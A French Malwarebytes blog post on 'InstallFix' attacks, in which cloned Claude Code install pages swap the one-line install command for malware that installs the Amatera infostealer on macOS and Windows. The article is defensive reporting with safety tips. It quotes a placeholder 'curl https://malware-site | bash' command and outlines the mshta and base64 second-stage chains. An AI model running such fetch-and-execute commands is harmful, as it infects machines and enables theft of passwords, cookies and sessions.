IA, Actualités, Escroqueries

De fausses pages d'installation de Fake Claude Code ciblent Mac Windows Mac avec des logiciels espions

par Pieter Arntz | 9 mars 2026
Logo Claude

Les pirates clonent les pages d'installation d'outils populaires tels que Claude Code et remplacent les commandes d'installation « one-liner » par des logiciels malveillants, principalement dans le but de voler des mots de passe, des cookies, des sessions et l'accès aux environnements de développement.

Les guides d'installation modernes vous demandent souvent de copier une seule commande telle que curl https://malware-site | bash dans votre terminal et appuyez sur Entrée. Cette habitude transforme le site Web en une télécommande : tout script présent à cette URL s'exécute avec vos autorisations, souvent celles d'un administrateur.

Les chercheurs ont découvert que les pirates exploitent ce flux de travail en conservant tout identique, ne modifiant que la destination vers laquelle cette ligne de code renvoie. Pour de nombreux utilisateurs non spécialisés qui viennent de commencer à utiliser l'IA et les outils de développement, cette méthode semble normale, ce qui les incite à baisser leur garde.

Mais cela revient essentiellement à dire « je fais confiance à ce domaine », ce qui n'est pas une bonne idée, sauf si vous êtes certain qu'il est fiable.

En général, cela se passe ainsi. Quelqu'un recherche « Claude Code install » ou « Claude Code CLI », voit un résultat sponsorisé en haut de la page avec une URL plausible et clique dessus sans trop réfléchir.

Mais cette publicité mène à une page de documentation ou de téléchargement clonée : même logo, même barre latérale, même texte et un bouton « Copier » familier à côté de la commande d'installation. Dans de nombreux cas, tout autre lien sur lequel vous cliquez sur cette fausse page vous redirige discrètement vers le site réel du fournisseur, de sorte que rien d'autre ne semble suspect.

Semblable aux attaques ClickFix, cette méthode est appelée InstallFix. L'utilisateur exécute le code qui infecte son propre ordinateur, sous de faux prétextes, et la charge utile est généralement un voleur d'informations.

La principale charge utile dans ces cas InstallFix sur le thème Claude Code est un voleur d'informations appelé Amatera. Il se concentre sur les données du navigateur telles que les mots de passe enregistrés, les cookies, les jetons de session, les données de remplissage automatique et les informations générales sur le système qui aident les attaquants à établir le profil de l'appareil. Grâce à cela, ils peuvent détourner des sessions Web et se connecter à des tableaux de bord cloud et à des panneaux d'administration internes sans jamais avoir besoin de votre mot de passe réel. Certains rapports mentionnent également un intérêt pour les portefeuilles cryptographiques et autres comptes de grande valeur.

Windows Mac

La campagne basée sur le Claude Code découverte par les chercheurs était conçue pour cibler à la fois Mac Windows Mac .

Sous macOS, la ligne de code malveillante récupère généralement un script de deuxième étape à partir d'un domaine contrôlé par l'attaquant, souvent obscurci avec base64 pour paraître bruyant mais inoffensif à première vue. Ce script télécharge et exécute ensuite un fichier binaire provenant d'un autre domaine, en supprimant les attributs et en le rendant exécutable avant de le lancer. 

Sous Windows, la commande a été vue en train de générer cmd.exe, qui appelle ensuite mshta.exe avec une URL distante. Cela permet à la logique du logiciel malveillant de s'exécuter comme un fichier binaire Microsoft fiable plutôt que comme un exécutable aléatoire évident. Dans les deux cas, rien de spectaculaire n'apparaît à l'écran : vous pensez avoir simplement installé un outil, tandis que la charge utile réelle commence silencieusement à faire son travail en arrière-plan.

Comment rester en sécurité

Avec ClickFix et InstallFix qui sévissent sans relâche, et qui ne semblent pas prêts de disparaître, il est important d'être vigilant, prudent et protégé.

  • Ralentissez. Nevous précipitez paspour suivre les instructions d'une page Web ou d'une invite, surtout si celles-ci vous demandent d'exécuter des commandes sur votre appareil ou de copier-coller du code. Analysez ce que la commande va faire avant de l'exécuter.
  • Évitez d'exécuter des commandes ou des scripts provenant de sources non fiables. N'exécutez jamaisde code ou de commandes copiés à partir de sites Web, d'e-mails ou de messages, sauf si vous faites confiance à la source et comprenez l'objectif de l'action. Vérifiez les instructions de manière indépendante. Si un site Web vous demande d'exécuter une commande ou d'effectuer une action technique, consultez la documentation officielle ou contactez le service d'assistance avant de continuer.
  • Limitez l'utilisation du copier-coller pour les commandes.Taper manuellementles commandes au lieu de les copier-coller peut réduire le risque d'exécuter à votre insu des charges utiles malveillantes cachées dans le texte copié.
  • Sécurisez vos appareils. Utilisezunesolution anti-malwareà jour et en temps réel, dotée d'un composant de protection Web.
  • Informez-vous sur les techniques d'attaque en constante évolution.Comprendre que les attaques peuvent provenir de vecteurs inattendus et évoluer permet de rester vigilant. Continuez à lire notre blog !

Conseil de pro :Saviez-vous que le logiciel gratuit Malwarebytes Browser Guard vous avertit lorsqu'un site web tente de copier quelque chose dans votre presse-papiers ?

Nous ne nous contentons pas de signaler les menaces, nous les éliminons.

Les risques de cybersécurité ne devraient jamais se propager au-delà d'un titre. Éliminez les menaces de vos appareils en téléchargeant Malwarebytes dès aujourd'hui.

À propos de l'auteur

Pieter Arntz

Pieter Arntz

Chercheur en intelligence malveillante

A été un Microsoft MVP dans le domaine de la sécurité des consommateurs pendant 12 années consécutives. Parle quatre langues. Sente l'acajou et les livres reliés en cuir.

DERNIERS ARTICLES

Comment faire
homme répondant à un questionnaire en ligne sur son ordinateur portable

Les sites de quiz incitent les utilisateurs à activer des notifications indésirables dans leur navigateur.

Mars 9, 2026

Le quiz n'est qu'un appât. Le véritable objectif est d'obtenir l'autorisation d'envoyer des notifications par navigateur qui pourront ensuite être utilisées à des fins publicitaires, frauduleuses ou promotionnelles douteuses.

Actualités
semaine de la sécurité

Une semaine en matière de sécurité (du 2 au 8 mars)

Mars 9, 2026

Liste des sujets abordés au cours de la semaine du 2 au 8 mars 2026

Podcast
Un cadenas illustré est monté sur un pied de microphone et des ondes sonores sont émises par l'appareil.

Sonnettes Ring : Ne voyez-vous pas mon voisin ? (Lock and Code S07E05)

Mars 8, 2026

Cette semaine, dans le podcast Lock and Code, nous discutons avec Matthew Guariglia des sonnettes intelligentes Ring et du réseau de surveillance qu'elles créent.

Icône des contributeurs

Les contributeurs

Icône du centre des menaces

Centre des menaces

Icône Podcasts

Podcast

Icône de glossaire

Glossaire

Icône d'escroquerie

Escroqueries